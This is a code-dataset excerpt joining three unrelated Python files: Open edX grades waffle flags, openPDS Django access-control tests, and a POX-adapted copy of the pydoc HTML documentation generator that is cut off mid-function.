waffle switches for the Grades app.
"""
from openedx.core.djangoapps.waffle_utils import CourseWaffleFlag, WaffleFlagNamespace, WaffleSwitchNamespace
# Namespace
WAFFLE_NAMESPACE = u'grades'
# Switches
ASSUME_ZERO_GRADE_IF_ABSENT = u'assume_zero_grade_if_absent'
DISABLE_REGRADE_ON_POLICY_CHANGE = u'disable_regrade_on_policy_change'
# Course Flags
REJECTED_EXAM_OVERRIDES_GRADE = u'rejected_exam_overrides_grade'
ENFORCE_FREEZE_GRADE_AFTER_COURSE_END = u'enforce_freeze_grade_after_course_end'
WRITABLE_GRADEBOOK = u'writable_gradebook'
BULK_MANAGEMENT = u'bulk_management'
def waffle():
"""
Returns the namespaced, cached, audited Waffle class for Grades.
"""
return WaffleSwitchNamespace(name=WAFFLE_NAMESPACE, log_prefix=u'Grades: ')
def waffle_flags():
"""
Returns the namespaced, cached, audited Waffle flags dictionary for Grades.
"""
namespace = WaffleFlagNamespace(name=WAFFLE_NAMESPACE, log_prefix=u'Grades: ')
return {
# By default, enable rejected exam grade overrides. Can be disabled on a course-by-course basis.
REJECTED_EXAM_OVERRIDES_GRADE: CourseWaffleFlag(
namespace,
REJECTED_EXAM_OVERRIDES_GRADE,
flag_undefined_default=True,
),
ENFORCE_FREEZE_GRADE_AFTER_COURSE_END: CourseWaffleFlag(
namespace,
ENFORCE_FREEZE_GRADE_AFTER_COURSE_END,
flag_undefined_default=True,
),
# Have this course override flag so we can selectively turn off the gradebook for courses.
WRITABLE_GRADEBOOK: CourseWaffleFlag(
namespace,
WRITABLE_GRADEBOOK,
flag_undefined_default=True,
),
BULK_MANAGEMENT: CourseWaffleFlag(
namespace,
BULK_MANAGEMENT,
flag_undefined_default=False,
),
}
def is_writable_gradebook_enabled(course_key):
"""
Returns whether the writable gradebook app is enabled for the given course.
"""
return waffle_flags()[WRITABLE_GRADEBOOK].is_enabled(course_key)
def gradebook_can_see_bulk_management(course_key):
"""
Returns whether bulk management features should be visible for the given course.
(provided that course contains a masters track, as of this writing)
"""
return waffle_flags()[BULK_MANAGEMENT].is_enabled(course_key)
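# Example check in course-aware code (course_key assumed to be an opaque-keys
# CourseKey instance):
#   if is_writable_gradebook_enabled(course_key):
#       ...expose the gradebook write endpoints for this course...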
| agpl-3.0 |
patcon/openPDS | openpds/accesscontrol/tests.py | 3 | 2697 | """
This file demonstrates writing tests using the unittest module. These will pass
when you run "manage.py test".
Replace this with more appropriate tests for your application.
"""
from django.test import TestCase
#from openpds.accesscontrol.models import FunfProbeGroupSetting, FunfProbeSetting
from openpds.core.internal import getAccessControlledInternalDataStore
import sqlite3
from openpds.core.models import Profile
from openpds import getInternalDataStore
from openpds.accesscontrol.models import Settings
from openpds.probedatavisualization_tasks import recentProbeDataScores
class SimpleTest(TestCase):
def test_basic_addition(self):
"""
Tests that 1 + 1 always equals 2.
"""
self.assertEqual(1 + 1, 2)
#class FunfProbeSettingsTestCase(TestCase):
# def setUp(self):
# #Funf probe groups
# motionGroup = FunfProbeGroupSetting.objects.create(funfProbeGroupName="motion", isProbeGroupSelected=True)
# socialGroup = FunfProbeGroupSetting.objects.create(funfProbeGroupName="social", isProbeGroupSelected=False)
#
# #Funf probes
# FunfProbeSetting.objects.create(funfProbe="edu.mit.media.funf.probe.builtin.ActivityProbe", isProbeSelected=True, funfProbeGroup=motionGroup)
# FunfProbeSetting.objects.create(funfProbe="edu.mit.media.funf.probe.builtin.SmsProbe", isProbeSelected=False, funfProbeGroup=socialGroup)
#
# def testFunfSettings(self):
# """Tests the assignment of probes."""
# activityProbe = FunfProbeSetting.objects.get(funfProbe="edu.mit.media.funf.probe.builtin.ActivityProbe")
# smsProbe = FunfProbeSetting.objects.get(funfProbe="edu.mit.media.funf.probe.builtin.SmsProbe")
# self.assertEqual(activityProbe.getIsProbeSelected(), False) #Should return an assertion error
# self.assertEqual(smsProbe.getIsProbeSelected(), False)
class InternalDataStoreTest(TestCase):
def setUp(self):
#user
owner = Profile.objects.create(uuid='12345')
        access_control_setting = Settings.objects.create(
            datastore_owner_id=owner.id, app_id='app', lab_id='lab',
            service_id='service', enabled=0, activity_probe=1, sms_probe=1,
            call_log_probe=1, bluetooth_probe=1, wifi_probe=1,
            simple_location_probe=1, screen_probe=1,
            running_applications_probe=1, hardware_info_probe=1,
            app_usage_probe=1)
def test_creation(self):
try:
owner = Profile.objects.get(uuid='12345')
internalDataStore = getAccessControlledInternalDataStore(owner, "app", "lab", "service")
internalDataStore.getData('bluetooth_probe', 0, 1000)
        except Profile.DoesNotExist:
            self.fail("Profile with uuid '12345' does not exist")
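    # --- Illustrative sketch (not in the original file): a minimal check that
    # the Settings row created in setUp() is retrievable. Only field names
    # already used above are referenced; the test name is hypothetical.
    def test_settings_lookup(self):
        owner = Profile.objects.get(uuid='12345')
        setting = Settings.objects.get(datastore_owner_id=owner.id, app_id='app')
        self.assertEqual(setting.bluetooth_probe, 1)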
class ProbeDataVisualizationTest(TestCase):
def test_visualization(self):
recentProbeDataScores()
| mit |
adusia/pox | tools/pox-pydoc.py | 78 | 93651 | #! /usr/bin/python2.7
# -*- coding: latin-1 -*-
"""Generate Python documentation in HTML or text for interactive use.
In the Python interpreter, do "from pydoc import help" to provide online
help. Calling help(thing) on a Python object documents the object.
Or, at the shell command line outside of Python:
Run "pydoc <name>" to show documentation on something. <name> may be
the name of a function, module, package, or a dotted reference to a
class or function within a module or module in a package. If the
argument contains a path segment delimiter (e.g. slash on Unix,
backslash on Windows) it is treated as the path to a Python source file.
Run "pydoc -k <keyword>" to search for a keyword in the synopsis lines
of all available modules.
Run "pydoc -p <port>" to start an HTTP server on a given port on the
local machine to generate documentation web pages.
For platforms without a command line, "pydoc -g" starts the HTTP server
and also pops up a little window for controlling it.
Run "pydoc -w <name>" to write out the HTML documentation for a module
to a file named "<name>.html".
Module docs for core modules are assumed to be in
http://docs.python.org/library/
This can be overridden by setting the PYTHONDOCS environment variable
to a different URL or to a local directory containing the Library
Reference Manual pages.
"""
__author__ = "Ka-Ping Yee <[email protected]>"
__date__ = "26 February 2001"
__version__ = "$Revision: 84174 $"
__credits__ = """Guido van Rossum, for an excellent programming language.
Tommy Burnette, the original creator of manpy.
Paul Prescod, for all his work on onlinehelp.
Richard Chamberlain, for the first implementation of textdoc.
"""
import sys
sys.path.append('..')
# Known bugs that can't be fixed here:
# - imp.load_module() cannot be prevented from clobbering existing
# loaded modules, so calling synopsis() on a binary module file
# changes the contents of any existing module with the same name.
# - If the __file__ attribute on a module is a relative path and
# the current directory is changed with os.chdir(), an incorrect
# path will be displayed.
import sys, imp, os, re, types, inspect, __builtin__, pkgutil
from repr import Repr
from string import expandtabs, find, join, lower, split, strip, rfind, rstrip
from traceback import extract_tb
try:
from collections import deque
except ImportError:
# Python 2.3 compatibility
class deque(list):
def popleft(self):
return self.pop(0)
# --------------------------------------------------------- common routines
def pathdirs():
"""Convert sys.path into a list of absolute, existing, unique paths."""
dirs = []
normdirs = []
for dir in sys.path:
dir = os.path.abspath(dir or '.')
normdir = os.path.normcase(dir)
if normdir not in normdirs and os.path.isdir(dir):
dirs.append(dir)
normdirs.append(normdir)
return dirs
def getdoc(object):
"""Get the doc string or comments for an object."""
result = inspect.getdoc(object) or inspect.getcomments(object)
return result and re.sub('^ *\n', '', rstrip(result)) or ''
def splitdoc(doc):
"""Split a doc string into a synopsis line (if any) and the rest."""
lines = split(strip(doc), '\n')
if len(lines) == 1:
return lines[0], ''
elif len(lines) >= 2 and not rstrip(lines[1]):
return lines[0], join(lines[2:], '\n')
return '', join(lines, '\n')
def classname(object, modname):
"""Get a class name and qualify it with a module name if necessary."""
name = object.__name__
if object.__module__ != modname:
name = object.__module__ + '.' + name
return name
def isdata(object):
"""Check if an object is of a type that probably means it's data."""
return not (inspect.ismodule(object) or inspect.isclass(object) or
inspect.isroutine(object) or inspect.isframe(object) or
inspect.istraceback(object) or inspect.iscode(object))
def replace(text, *pairs):
"""Do a series of global replacements on a string."""
while pairs:
text = join(split(text, pairs[0]), pairs[1])
pairs = pairs[2:]
return text
def cram(text, maxlen):
"""Omit part of a string if needed to make it fit in a maximum length."""
if len(text) > maxlen:
pre = max(0, (maxlen-3)//2)
post = max(0, maxlen-3-pre)
return text[:pre] + '...' + text[len(text)-post:]
return text
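# For example, following the arithmetic above: cram('abcdefghij', 9) keeps
# max(0, (9-3)//2) = 3 leading and 9-3-3 = 3 trailing characters, giving
# 'abc...hij'; strings that already fit are returned unchanged.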
_re_stripid = re.compile(r' at 0x[0-9a-f]{6,16}(>+)$', re.IGNORECASE)
def stripid(text):
"""Remove the hexadecimal id from a Python object representation."""
# The behaviour of %p is implementation-dependent in terms of case.
return _re_stripid.sub(r'\1', text)
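# For example: stripid('<Foo instance at 0x1234abcd>') -> '<Foo instance>';
# the (>+) group preserves the trailing angle bracket(s).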
def _is_some_method(obj):
return inspect.ismethod(obj) or inspect.ismethoddescriptor(obj)
def allmethods(cl):
methods = {}
for key, value in inspect.getmembers(cl, _is_some_method):
methods[key] = 1
for base in cl.__bases__:
methods.update(allmethods(base)) # all your base are belong to us
for key in methods.keys():
methods[key] = getattr(cl, key)
return methods
def _split_list(s, predicate):
"""Split sequence s via predicate, and return pair ([true], [false]).
The return value is a 2-tuple of lists,
([x for x in s if predicate(x)],
[x for x in s if not predicate(x)])
"""
yes = []
no = []
for x in s:
if predicate(x):
yes.append(x)
else:
no.append(x)
return yes, no
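# For example: _split_list([1, 2, 3, 4], lambda x: x % 2) == ([1, 3], [2, 4]).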
def visiblename(name, all=None):
"""Decide whether to show documentation on a variable."""
# Certain special names are redundant.
_hidden_names = ('__builtins__', '__doc__', '__file__', '__path__',
'__module__', '__name__', '__slots__', '__package__',
'__dict__', '__weakref__')
if name in _hidden_names: return 0
# Private names are hidden, but special names are displayed.
if name.startswith('__') and name.endswith('__'): return 1
if all is not None:
# only document that which the programmer exported in __all__
return name in all
elif name.startswith('_handle_'):
return 1
else:
return not name.startswith('_')
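# Examples of the rules above, when __all__ is absent: '__doc__' is hidden,
# '__init__' is shown (special name), '_handle_PacketIn' is shown (the POX
# event-handler convention), and other '_private' names are hidden.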
def classify_class_attrs(object):
"""Wrap inspect.classify_class_attrs, with fixup for data descriptors."""
def fixup(data):
name, kind, cls, value = data
if inspect.isdatadescriptor(value):
kind = 'data descriptor'
return name, kind, cls, value
return map(fixup, inspect.classify_class_attrs(object))
# ----------------------------------------------------- module manipulation
def ispackage(path):
"""Guess whether a path refers to a package directory."""
if os.path.isdir(path):
for ext in ('.py', '.pyc', '.pyo'):
if os.path.isfile(os.path.join(path, '__init__' + ext)):
return True
return False
def source_synopsis(file):
line = file.readline()
while line[:1] == '#' or not strip(line):
line = file.readline()
if not line: break
line = strip(line)
if line[:4] == 'r"""': line = line[1:]
if line[:3] == '"""':
line = line[3:]
if line[-1:] == '\\': line = line[:-1]
while not strip(line):
line = file.readline()
if not line: break
result = strip(split(line, '"""')[0])
else: result = None
return result
def synopsis(filename, cache={}):
"""Get the one-line summary out of a module file."""
mtime = os.stat(filename).st_mtime
lastupdate, result = cache.get(filename, (0, None))
if lastupdate < mtime:
info = inspect.getmoduleinfo(filename)
try:
file = open(filename)
except IOError:
# module can't be opened, so skip it
return None
if info and 'b' in info[2]: # binary modules have to be imported
try: module = imp.load_module('__temp__', file, filename, info[1:])
except: return None
result = (module.__doc__ or '').splitlines()[0]
del sys.modules['__temp__']
else: # text modules can be directly examined
result = source_synopsis(file)
file.close()
cache[filename] = (mtime, result)
return result
class ErrorDuringImport(Exception):
"""Errors that occurred while trying to import something to document it."""
def __init__(self, filename, exc_info):
exc, value, tb = exc_info
self.filename = filename
self.exc = exc
self.value = value
self.tb = tb
def __str__(self):
exc = self.exc
if type(exc) is types.ClassType:
exc = exc.__name__
return 'problem in %s - %s: %s' % (self.filename, exc, self.value)
def importfile(path):
"""Import a Python source file or compiled file given its path."""
magic = imp.get_magic()
file = open(path, 'r')
if file.read(len(magic)) == magic:
kind = imp.PY_COMPILED
else:
kind = imp.PY_SOURCE
file.close()
filename = os.path.basename(path)
name, ext = os.path.splitext(filename)
file = open(path, 'r')
try:
module = imp.load_module(name, file, path, (ext, 'r', kind))
except:
raise ErrorDuringImport(path, sys.exc_info())
file.close()
return module
def safeimport(path, forceload=0, cache={}):
"""Import a module; handle errors; return None if the module isn't found.
If the module *is* found but an exception occurs, it's wrapped in an
ErrorDuringImport exception and reraised. Unlike __import__, if a
package path is specified, the module at the end of the path is returned,
not the package at the beginning. If the optional 'forceload' argument
is 1, we reload the module from disk (unless it's a dynamic extension)."""
try:
# If forceload is 1 and the module has been previously loaded from
# disk, we always have to reload the module. Checking the file's
# mtime isn't good enough (e.g. the module could contain a class
# that inherits from another module that has changed).
if forceload and path in sys.modules:
if path not in sys.builtin_module_names:
# Avoid simply calling reload() because it leaves names in
# the currently loaded module lying around if they're not
# defined in the new source file. Instead, remove the
# module from sys.modules and re-import. Also remove any
# submodules because they won't appear in the newly loaded
# module's namespace if they're already in sys.modules.
subs = [m for m in sys.modules if m.startswith(path + '.')]
for key in [path] + subs:
# Prevent garbage collection.
cache[key] = sys.modules[key]
del sys.modules[key]
module = __import__(path)
except:
# Did the error occur before or after the module was found?
(exc, value, tb) = info = sys.exc_info()
if path in sys.modules:
# An error occurred while executing the imported module.
raise ErrorDuringImport(sys.modules[path].__file__, info)
elif exc is SyntaxError:
# A SyntaxError occurred before we could execute the module.
raise ErrorDuringImport(value.filename, info)
elif exc is ImportError and extract_tb(tb)[-1][2]=='safeimport':
# The import error occurred directly in this function,
# which means there is no such module in the path.
return None
else:
# Some other error occurred during the importing process.
raise ErrorDuringImport(path, sys.exc_info())
for part in split(path, '.')[1:]:
try: module = getattr(module, part)
except AttributeError: return None
return module
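# For example: safeimport('os.path') returns the os.path module itself (not
# the os package), while safeimport('no.such.module') returns None rather
# than raising, as described in the docstring above.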
# ---------------------------------------------------- formatter base class
class Doc:
def document(self, object, name=None, *args):
"""Generate documentation for an object."""
args = (object, name) + args
# 'try' clause is to attempt to handle the possibility that inspect
# identifies something in a way that pydoc itself has issues handling;
# think 'super' and how it is a descriptor (which raises the exception
# by lacking a __name__ attribute) and an instance.
if inspect.isgetsetdescriptor(object): return self.docdata(*args)
if inspect.ismemberdescriptor(object): return self.docdata(*args)
try:
if inspect.ismodule(object): return self.docmodule(*args)
if inspect.isclass(object): return self.docclass(*args)
if inspect.isroutine(object): return self.docroutine(*args)
except AttributeError:
pass
if isinstance(object, property): return self.docproperty(*args)
return self.docother(*args)
def fail(self, object, name=None, *args):
"""Raise an exception for unimplemented types."""
message = "don't know how to document object%s of type %s" % (
name and ' ' + repr(name), type(object).__name__)
raise TypeError, message
docmodule = docclass = docroutine = docother = docproperty = docdata = fail
def getdocloc(self, object):
"""Return the location of module docs or None"""
try:
file = inspect.getabsfile(object)
except TypeError:
file = '(built-in)'
docloc = os.environ.get("PYTHONDOCS",
"http://docs.python.org/library")
basedir = os.path.join(sys.exec_prefix, "lib",
"python"+sys.version[0:3])
if (isinstance(object, type(os)) and
(object.__name__ in ('errno', 'exceptions', 'gc', 'imp',
'marshal', 'posix', 'signal', 'sys',
'thread', 'zipimport') or
(file.startswith(basedir) and
not file.startswith(os.path.join(basedir, 'site-packages')))) and
object.__name__ not in ('xml.etree', 'test.pydoc_mod')):
if docloc.startswith("http://"):
docloc = "%s/%s" % (docloc.rstrip("/"), object.__name__)
else:
docloc = os.path.join(docloc, object.__name__ + ".html")
else:
docloc = None
return docloc
# -------------------------------------------- HTML documentation generator
class HTMLRepr(Repr):
"""Class for safely making an HTML representation of a Python object."""
def __init__(self):
Repr.__init__(self)
self.maxlist = self.maxtuple = 20
self.maxdict = 10
self.maxstring = self.maxother = 100
def escape(self, text):
        return replace(text, '&', '&amp;', '<', '&lt;', '>', '&gt;')
def repr(self, object):
return Repr.repr(self, object)
def repr1(self, x, level):
if hasattr(type(x), '__name__'):
methodname = 'repr_' + join(split(type(x).__name__), '_')
if hasattr(self, methodname):
return getattr(self, methodname)(x, level)
return self.escape(cram(stripid(repr(x)), self.maxother))
def repr_string(self, x, level):
test = cram(x, self.maxstring)
testrepr = repr(test)
if '\\' in test and '\\' not in replace(testrepr, r'\\', ''):
# Backslashes are only literal in the string and are never
# needed to make any special characters, so show a raw string.
return 'r' + testrepr[0] + self.escape(test) + testrepr[0]
return re.sub(r'((\\[\\abfnrtv\'"]|\\[0-9]..|\\x..|\\u....)+)',
r'<font color="#c040c0">\1</font>',
self.escape(testrepr))
repr_str = repr_string
def repr_instance(self, x, level):
try:
return self.escape(cram(stripid(repr(x)), self.maxstring))
except:
return self.escape('<%s instance>' % x.__class__.__name__)
repr_unicode = repr_string
class HTMLDoc(Doc):
"""Formatter class for HTML documentation."""
# ------------------------------------------- HTML formatting utilities
_repr_instance = HTMLRepr()
repr = _repr_instance.repr
escape = _repr_instance.escape
def page(self, title, contents):
"""Format an HTML page."""
return '''
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html><head><title>Python: %s</title>
</head><body bgcolor="#f0f0f8">
%s
</body></html>''' % (title, contents)
def heading(self, title, fgcol, bgcol, extras=''):
"""Format a page heading."""
return '''
<table width="100%%" cellspacing=0 cellpadding=2 border=0 summary="heading">
<tr bgcolor="%s">
<td valign=bottom>&nbsp;<br>
<font color="%s" face="helvetica, arial">&nbsp;<br>%s</font></td
><td align=right valign=bottom
><font color="%s" face="helvetica, arial">%s</font></td></tr></table>
    ''' % (bgcol, fgcol, title, fgcol, extras or '&nbsp;')
def section(self, title, fgcol, bgcol, contents, width=6,
                prelude='', marginalia=None, gap='&nbsp;'):
"""Format a section with a heading."""
if marginalia is None:
            marginalia = '<tt>' + '&nbsp;' * width + '</tt>'
result = '''<p>
<table width="100%%" cellspacing=0 cellpadding=2 border=0 summary="section">
<tr bgcolor="%s">
<td colspan=3 valign=bottom>&nbsp;<br>
<font color="%s" face="helvetica, arial">%s</font></td></tr>
''' % (bgcol, fgcol, title)
if prelude:
result = result + '''
<tr bgcolor="%s"><td rowspan=2>%s</td>
<td colspan=2>%s</td></tr>
<tr><td>%s</td>''' % (bgcol, marginalia, prelude, gap)
else:
result = result + '''
<tr><td bgcolor="%s">%s</td><td>%s</td>''' % (bgcol, marginalia, gap)
return result + '\n<td width="100%%">%s</td></tr></table>' % contents
def bigsection(self, title, *args):
"""Format a section with a big heading."""
title = '<big><strong>%s</strong></big>' % title
return self.section(title, *args)
def preformat(self, text):
"""Format literal preformatted text."""
text = self.escape(expandtabs(text))
return replace(text, '\n\n', '\n \n', '\n\n', '\n \n',
                       ' ', '&nbsp;', '\n', '<br>\n')
def multicolumn(self, list, format, cols=4):
"""Format a list of items into a multi-column list."""
result = ''
rows = (len(list)+cols-1)/cols
for col in range(cols):
result = result + '<td width="%d%%" valign=top>' % (100/cols)
for i in range(rows*col, rows*col+rows):
if i < len(list):
result = result + format(list[i]) + '<br>\n'
result = result + '</td>'
return '<table width="100%%" summary="list"><tr>%s</tr></table>' % result
def grey(self, text): return '<font color="#909090">%s</font>' % text
def namelink(self, name, *dicts):
"""Make a link for an identifier, given name-to-URL mappings."""
for dict in dicts:
if name in dict:
return '<a href="%s">%s</a>' % (dict[name], name)
return name
def classlink(self, object, modname):
"""Make a link for a class."""
name, module = object.__name__, sys.modules.get(object.__module__)
if modname == '__builtin__': #MM
return classname(object, object.__module__) #MM
if hasattr(module, name) and getattr(module, name) is object:
return '<a href="%s.html#%s">%s</a>' % (
module.__name__, name, classname(object, modname))
return classname(object, modname)
def modulelink(self, object):
"""Make a link for a module."""
return '<a href="%s.html">%s</a>' % (object.__name__, object.__name__)
def modpkglink(self, data):
"""Make a link for a module or package to display in an index."""
name, path, ispackage, shadowed = data
if shadowed:
return self.grey(name)
if path:
url = '%s.%s.html' % (path, name)
else:
url = '%s.html' % name
if ispackage:
text = '<strong>%s</strong> (package)' % name
else:
text = name
return '<a href="%s">%s</a>' % (url, text)
def markup(self, text, escape=None, funcs={}, classes={}, methods={}):
"""Mark up some plain text, given a context of symbols to look for.
Each context dictionary maps object names to anchor names."""
escape = escape or self.escape
results = []
here = 0
pattern = re.compile(r'\b((http|ftp)://\S+[\w/]|'
r'RFC[- ]?(\d+)|'
r'PEP[- ]?(\d+)|'
r'(self\.)?(\w+))')
while True:
match = pattern.search(text, here)
if not match: break
start, end = match.span()
results.append(escape(text[here:start]))
all, scheme, rfc, pep, selfdot, name = match.groups()
if scheme:
url = escape(all).replace('"', '"')
results.append('<a href="%s">%s</a>' % (url, url))
elif rfc:
url = 'http://www.rfc-editor.org/rfc/rfc%d.txt' % int(rfc)
results.append('<a href="%s">%s</a>' % (url, escape(all)))
elif pep:
url = 'http://www.python.org/dev/peps/pep-%04d/' % int(pep)
results.append('<a href="%s">%s</a>' % (url, escape(all)))
elif text[end:end+1] == '(':
results.append(self.namelink(name, methods, funcs, classes))
elif selfdot:
results.append('self.<strong>%s</strong>' % name)
else:
results.append(self.namelink(name, classes))
here = end
results.append(escape(text[here:]))
return join(results, '')
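    # For example, given the rules above: 'PEP 8' links to
    # http://www.python.org/dev/peps/pep-0008/, 'RFC 2616' links to
    # http://www.rfc-editor.org/rfc/rfc2616.txt, and 'self.foo' is rendered
    # as self.<strong>foo</strong>.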
# ---------------------------------------------- type-specific routines
def formattree(self, tree, modname, parent=None):
"""Produce HTML for a class tree as given by inspect.getclasstree()."""
result = ''
for entry in tree:
if type(entry) is type(()):
c, bases = entry
result = result + '<dt><font face="helvetica, arial">'
result = result + self.classlink(c, modname)
if bases and bases != (parent,):
parents = []
for base in bases:
parents.append(self.classlink(base, modname))
result = result + '(' + join(parents, ', ') + ')'
result = result + '\n</font></dt>'
elif type(entry) is type([]):
result = result + '<dd>\n%s</dd>\n' % self.formattree(
entry, modname, c)
return '<dl>\n%s</dl>\n' % result
def docmodule(self, object, name=None, mod=None, *ignored):
"""Produce HTML documentation for a module object."""
name = object.__name__ # ignore the passed-in name
try:
all = object.__all__
except AttributeError:
all = None
parts = split(name, '.')
links = []
for i in range(len(parts)-1):
links.append(
'<a href="%s.html"><font color="#ffffff">%s</font></a>' %
(join(parts[:i+1], '.'), parts[i]))
linkedname = join(links + parts[-1:], '.')
head = '<big><big><strong>%s</strong></big></big>' % linkedname
try:
path = inspect.getfile(object)
if path.endswith('.pyc'): path = path[:-1]
url = path
if sys.platform == 'win32':
import nturl2path
url = nturl2path.pathname2url(path)
if path.startswith('./'): path = path[2:]
filelink = '<a href="../../hg/pox/file/tip/%s">%s</a>' % (url, path)
except TypeError:
filelink = '(built-in)'
info = []
if hasattr(object, '__version__'):
version = str(object.__version__)
if version[:11] == '$' + 'Revision: ' and version[-1:] == '$':
version = strip(version[11:-1])
info.append('version %s' % self.escape(version))
if hasattr(object, '__date__'):
info.append(self.escape(str(object.__date__)))
if info:
head = head + ' (%s)' % join(info, ', ')
docloc = self.getdocloc(object)
if docloc is not None:
docloc = '<br><a href="%(docloc)s">Module Docs</a>' % locals()
else:
docloc = ''
result = self.heading(
head, '#ffffff', '#7799ee',
'<a href=".">index</a><br>' + filelink + docloc)
modules = inspect.getmembers(object, inspect.ismodule)
classes, cdict = [], {}
for key, value in inspect.getmembers(object, inspect.isclass):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None or
(inspect.getmodule(value) or object) is object):
if visiblename(key, all):
classes.append((key, value))
cdict[key] = cdict[value] = '#' + key
for key, value in classes:
for base in value.__bases__:
key, modname = base.__name__, base.__module__
module = sys.modules.get(modname)
if modname != name and module and hasattr(module, key):
if getattr(module, key) is base:
if not key in cdict:
cdict[key] = cdict[base] = modname + '.html#' + key
funcs, fdict = [], {}
for key, value in inspect.getmembers(object, inspect.isroutine):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None or
inspect.isbuiltin(value) or inspect.getmodule(value) is object):
if visiblename(key, all):
funcs.append((key, value))
fdict[key] = '#-' + key
if inspect.isfunction(value): fdict[value] = fdict[key]
data = []
for key, value in inspect.getmembers(object, isdata):
if visiblename(key, all):
data.append((key, value))
doc = self.markup(getdoc(object), self.preformat, fdict, cdict)
doc = doc and '<tt>%s</tt>' % doc
result = result + '<p>%s</p>\n' % doc
if hasattr(object, '__path__'):
modpkgs = []
for importer, modname, ispkg in pkgutil.iter_modules(object.__path__):
modpkgs.append((modname, name, ispkg, 0))
modpkgs.sort()
contents = self.multicolumn(modpkgs, self.modpkglink)
result = result + self.bigsection(
'Package Contents', '#ffffff', '#aa55cc', contents)
elif modules:
contents = self.multicolumn(
modules, lambda key_value, s=self: s.modulelink(key_value[1]))
result = result + self.bigsection(
'Modules', '#ffffff', '#aa55cc', contents)
if classes:
classlist = map(lambda key_value: key_value[1], classes)
contents = [
self.formattree(inspect.getclasstree(classlist, 1), name)]
for key, value in classes:
contents.append(self.document(value, key, name, fdict, cdict))
result = result + self.bigsection(
'Classes', '#ffffff', '#ee77aa', join(contents))
if funcs:
contents = []
for key, value in funcs:
contents.append(self.document(value, key, name, fdict, cdict))
result = result + self.bigsection(
'Functions', '#ffffff', '#eeaa77', join(contents))
if data:
contents = []
for key, value in data:
contents.append(self.document(value, key))
result = result + self.bigsection(
'Data', '#ffffff', '#55aa55', join(contents, '<br>\n'))
if hasattr(object, '__author__'):
contents = self.markup(str(object.__author__), self.preformat)
result = result + self.bigsection(
'Author', '#ffffff', '#7799ee', contents)
if hasattr(object, '__credits__'):
contents = self.markup(str(object.__credits__), self.preformat)
result = result + self.bigsection(
'Credits', '#ffffff', '#7799ee', contents)
return result
def docclass(self, object, name=None, mod=None, funcs={}, classes={},
*ignored):
"""Produce HTML documentation for a class object."""
realname = object.__name__
name = name or realname
bases = object.__bases__
contents = []
push = contents.append
# Cute little class to pump out a horizontal rule between sections.
class HorizontalRule:
def __init__(self):
self.needone = 0
def maybe(self):
if self.needone:
push('<hr>\n')
self.needone = 1
hr = HorizontalRule()
# List the mro, if non-trivial.
mro = deque(inspect.getmro(object))
if len(mro) > 2:
hr.maybe()
push('<dl><dt>Method resolution order:</dt>\n')
for base in mro:
push('<dd>%s</dd>\n' % self.classlink(base,
object.__module__))
push('</dl>\n')
def spill(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
push(self.document(getattr(object, name), name, mod,
funcs, classes, mdict, object))
push('\n')
return attrs
def spilldescriptors(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
push(self._docdescriptor(name, value, mod))
return attrs
def spilldata(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
base = self.docother(getattr(object, name), name, mod)
if (hasattr(value, '__call__') or
inspect.isdatadescriptor(value)):
doc = getattr(value, "__doc__", None)
else:
doc = None
if doc is None:
push('<dl><dt>%s</dl>\n' % base)
else:
doc = self.markup(getdoc(value), self.preformat,
funcs, classes, mdict)
doc = '<dd><tt>%s</tt>' % doc
push('<dl><dt>%s%s</dl>\n' % (base, doc))
push('\n')
return attrs
attrs = filter(lambda data: visiblename(data[0]),
classify_class_attrs(object))
mdict = {}
for key, kind, homecls, value in attrs:
mdict[key] = anchor = '#' + name + '-' + key
value = getattr(object, key)
try:
# The value may not be hashable (e.g., a data attr with
# a dict or list value).
mdict[value] = anchor
except TypeError:
pass
while attrs:
if mro:
thisclass = mro.popleft()
else:
thisclass = attrs[0][2]
attrs, inherited = _split_list(attrs, lambda t: t[2] is thisclass)
if thisclass is __builtin__.object:
attrs = inherited
continue
elif thisclass is object:
tag = 'defined here'
elif thisclass.__name__ == "EventMixin":
# Special case -- don't show
attrs = inherited
continue
else:
tag = 'inherited from %s' % self.classlink(thisclass,
object.__module__)
tag += ':<br>\n'
# Sort attrs by name.
try:
attrs.sort(key=lambda t: t[0])
except TypeError:
attrs.sort(lambda t1, t2: cmp(t1[0], t2[0])) # 2.3 compat
from pox.lib.revent import EventMixin
if hasattr(object, '_eventMixin_events') and issubclass(object, EventMixin):
events = list(object._eventMixin_events)
if len(events) > 0:
events.sort(key=lambda t: t.__name__)
hr.maybe()
push('<dl><dt>Class-level events:</dt>\n')
for e in events:
push('<dd>%s</dd>\n' % self.classlink(e,
object.__module__))
push('</dl>\n')
# Pump out the attrs, segregated by kind.
attrs = spill('Methods %s' % tag, attrs,
lambda t: t[1] == 'method')
attrs = spill('Class methods %s' % tag, attrs,
lambda t: t[1] == 'class method')
attrs = spill('Static methods %s' % tag, attrs,
lambda t: t[1] == 'static method')
attrs = spilldescriptors('Data descriptors %s' % tag, attrs,
lambda t: t[1] == 'data descriptor')
attrs = spilldata('Data and other attributes %s' % tag, attrs,
lambda t: t[1] == 'data')
assert attrs == []
attrs = inherited
contents = ''.join(contents)
if name == realname:
title = '<a name="%s">class <strong>%s</strong></a>' % (
name, realname)
else:
title = '<strong>%s</strong> = <a name="%s">class %s</a>' % (
name, name, realname)
if bases:
parents = []
for base in bases:
parents.append(self.classlink(base, object.__module__))
title = title + '(%s)' % join(parents, ', ')
doc = self.markup(getdoc(object), self.preformat, funcs, classes, mdict)
        doc = doc and '<tt>%s<br>&nbsp;</tt>' % doc
return self.section(title, '#000000', '#ffc8d8', contents, 3, doc)
def formatvalue(self, object):
"""Format an argument default value as text."""
return self.grey('=' + self.repr(object))
def docroutine(self, object, name=None, mod=None,
funcs={}, classes={}, methods={}, cl=None):
"""Produce HTML documentation for a function or method object."""
realname = object.__name__
name = name or realname
anchor = (cl and cl.__name__ or '') + '-' + name
note = ''
skipdocs = 0
if inspect.ismethod(object):
imclass = object.im_class
if cl:
if imclass is not cl:
note = ' from ' + self.classlink(imclass, mod)
else:
if object.im_self is not None:
